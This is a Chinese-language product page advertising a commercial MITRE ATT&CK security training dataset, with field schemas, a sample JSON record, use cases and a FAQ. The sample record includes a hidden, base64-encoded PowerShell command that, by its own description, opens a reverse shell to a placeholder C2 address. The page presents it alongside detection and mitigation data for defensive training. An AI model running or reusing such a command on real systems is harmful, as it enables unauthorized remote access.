MITRE ATT&CK 安全技能训练数据集

1,000~20,000条ATT&CK攻防技能训练数据 | 14战术/200+技术全覆盖 | 五元组关联结构 | 安全大模型预训练/SFT专用语料

20,000条
训练数据总量
14战术
ATT&CK全覆盖
200+技术
技术覆盖面
五元组
关联结构
1-2月
交付周期

数据集概览

定义:MITRE ATT&CK 安全技能训练数据集是由长沙朗慧信息科技有限公司基于公开ATT&CK知识框架,结合真实攻防场景、威胁情报报告与安全事件数据构建的高质量安全训练数据集。覆盖全部14个战术类别、200+技术/子技术,每条数据以「XML规则 + PCAP流量 + HTTP还原文本 + 攻击类型标签 + 标准答案」五元组关联结构组织。

数据集名称MITRE ATT&CK 安全技能训练数据集
数据总量1,000~20,000条
数据类型JSON + PCAP(五元组关联结构)
数据来源朗慧安全实验室 + 公开威胁情报
授权方式商业授权 附带完整授权文件
交付周期1-2个月
涵盖战术Reconnaissance / Resource Development / Initial Access / Execution / Persistence / Privilege Escalation / Defense Evasion / Credential Access / Discovery / Lateral Movement / Collection / Command and Control / Exfiltration / Impact(14项全覆盖)
输出格式JSONL / CSV / Excel
语言中英双语

核心数据字段

每条数据包含完整的ATT&CK技术元数据、攻击描述、检测方法、缓解措施、过程示例及PCAP关联信息,覆盖从知识注入到实战训练的全场景需求。

字段类别字段数典型字段
技术元数据6technique_id(ATT&CK技术ID)、name(技术名称)、tactic(所属战术)、platform(适用平台)、permissions_required(所需权限)、data_sources(数据源)
攻击过程描述3description(攻击技术详细描述)、procedure_example(真实APT过程示例)、detection_recommendation(检测建议)
检测方法3detection_type(检测类型)、data_source_required(所需数据源)、detection_logic(检测逻辑描述)
缓解措施3mitigation_id(缓解措施ID)、mitigation_name(措施名称)、mitigation_description(措施详细描述)
过程示例3example_command(示例命令)、example_tool(使用工具)、procedure_description(过程描述)
PCAP关联4pcap_file(PCAP文件名)、pcap_md5(文件MD5)、pcap_size(文件大小)、flow_signature(流量特征签名)

数据样例展示

以下为结构化 JSON 样例,展示ATT&CK技术的五元组训练数据格式。

{
  "entry_id": "ATTACK-TRN-2024-0001523",
  "technique_metadata": {
    "technique_id": "T1059",
    "name": "命令与脚本解释器",
    "tactic": "Execution",
    "platform": ["Windows", "Linux", "macOS"],
    "permissions_required": "User",
    "data_sources": ["Process Creation", "Command Execution", "Script Load"]
  },
  "attack_description": {
    "description": "攻击者利用命令和脚本解释器(如PowerShell、Bash、Python)执行恶意命令、脚本或二进制文件。这是最常见的攻击执行手段之一,可绕过应用白名单等防御机制。",
    "procedure_example": "APT29使用PowerShell执行无文件攻击,通过Invoke-Expression加载内存中的恶意载荷,并利用WMI持久化。",
    "detection_recommendation": "监控PowerShell脚本块日志(Event ID 4104)、进程创建事件(Event ID 4688)、命令行参数审计。"
  },
  "detection": {
    "detection_type": "Behavioral",
    "data_source_required": ["Windows Event Log", "Sysmon", "EDR"],
    "detection_logic": "检测非交互式PowerShell执行(-EncodedCommand、-WindowStyle Hidden)、Bash反弹Shell、Python调用subprocess/os.system执行系统命令。"
  },
  "mitigation": {
    "mitigation_id": "M1042",
    "mitigation_name": "禁用或限制脚本解释器",
    "mitigation_description": "配置AppLocker/WDAC限制脚本执行,启用PowerShell约束语言模式,使用组策略禁用不必要的脚本解释器。"
  },
  "procedure_example": {
    "example_command": "powershell -NoP -NonI -W Hidden -Enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADEALgAxADAAMAAiACwANAA0ADQANAApADsA",
    "example_tool": "PowerShell Empire",
    "procedure_description": "使用Base64编码的PowerShell命令建立反向TCP连接,连接C2服务器192.168.1.100:4444。"
  },
  "pcap_info": {
    "pcap_file": "T1059_cmd_shell_reverse_20240115.pcap",
    "pcap_md5": "a3f8b2c91d4e5f60789a1b2c3d4e5f60",
    "pcap_size": "245678",
    "flow_signature": "TCP SYN → 192.168.1.100:4444, Base64 PowerShell payload in HTTP POST body"
  },
  "answer": {
    "is_attack": true,
    "attack_type": "命令执行",
    "attck_phase": "Execution",
    "true_positive_rate": 0.97
  }
}

AI 应用场景

安全大模型预训练与SFT

20,000条高质量ATT&CK结构化训练数据,覆盖完整攻击生命周期,支持GPT/LLaMA/Qwen等基座模型在网络安全领域的预训练和监督微调,显著提升模型的攻防知识深度。

ATT&CK知识注入增强

基于14大战术200+技术的结构化知识体系,为安全大模型注入系统化ATT&CK知识图谱,使模型具备准确识别、解释和推理攻击行为的能力。

TTP推理能力训练

五元组关联数据支持模型学习「攻击手法→工具→流量特征→检测规则→标准答案」的完整推理链路,训练安全基座模型的因果推理与证据链构建能力。

SOC自动化编排

基于ATT&CK技术映射的检测规则与响应措施,训练SOC自动化剧本编排AI,实现告警→ATT&CK映射→检测规则触发→响应措施执行的端到端自动化。

攻防对抗模拟演练

丰富的攻击过程示例和PCAP流量数据,可用于构建AI驱动的攻防演练平台,自动化生成红队攻击路径和蓝队检测响应策略。

威胁情报关联分析

将CTI报告中的TTP描述与ATT&CK技术条目自动对齐,训练威胁情报关联分析AI,实现从情报文本到技术图谱的自动映射与攻击组织画像。

常见问题

数据的授权方式是怎样的?可以用于商业AI训练吗?
本数据集由长沙朗慧信息科技有限公司提供商业授权,授权范围明确覆盖商业AI模型训练场景。您可在授权范围内合法使用数据集进行模型训练、微调和评测。详细授权条款请联系商务获取。
本数据集与原始MITRE ATT&CK知识库有什么区别?
MITRE ATT&CK知识库提供公开的技术描述文档,而本数据集在此基础上增加了:①真实攻击过程示例与命令;②PCAP网络流量数据;③结构化检测规则;④标准答案标注。是面向AI训练优化过的"可训练"版本,非单纯的文档型知识库。
数据更新频率如何?是否会覆盖最新ATT&CK版本?
数据集随MITRE ATT&CK框架更新同步迭代,新版本发布后1-2个月内完成数据补全。商业客户可享受年度更新服务,确保覆盖最新的APT技术和攻击手法。
是否支持按特定战术或技术定制子集?
支持。您可按战术(如仅Initial Access/Persistence)、按平台(如仅Windows/Linux)、按技术ID列表等维度灵活定制。也支持根据您的业务场景增加自定义攻击实例和检测规则。
如何获取数据或商务咨询?
本数据集由长沙朗慧信息科技有限公司旗下 DataAssetsAPI 平台运营。支持标准数据集和按需定制两种模式。请联系我们获取详细数据目录、样本预览和报价方案。

需要定制化的ATT&CK安全数据方案?

长沙朗慧信息科技有限公司 DataAssetsAPI 平台,致力于为 AI 企业、科研机构提供高质量、合规的安全数据资产。支持按攻击类型、按技术覆盖、按数量规模灵活组合。

数据样本预览 · 定制化战术/技术子集 · 专业技术支持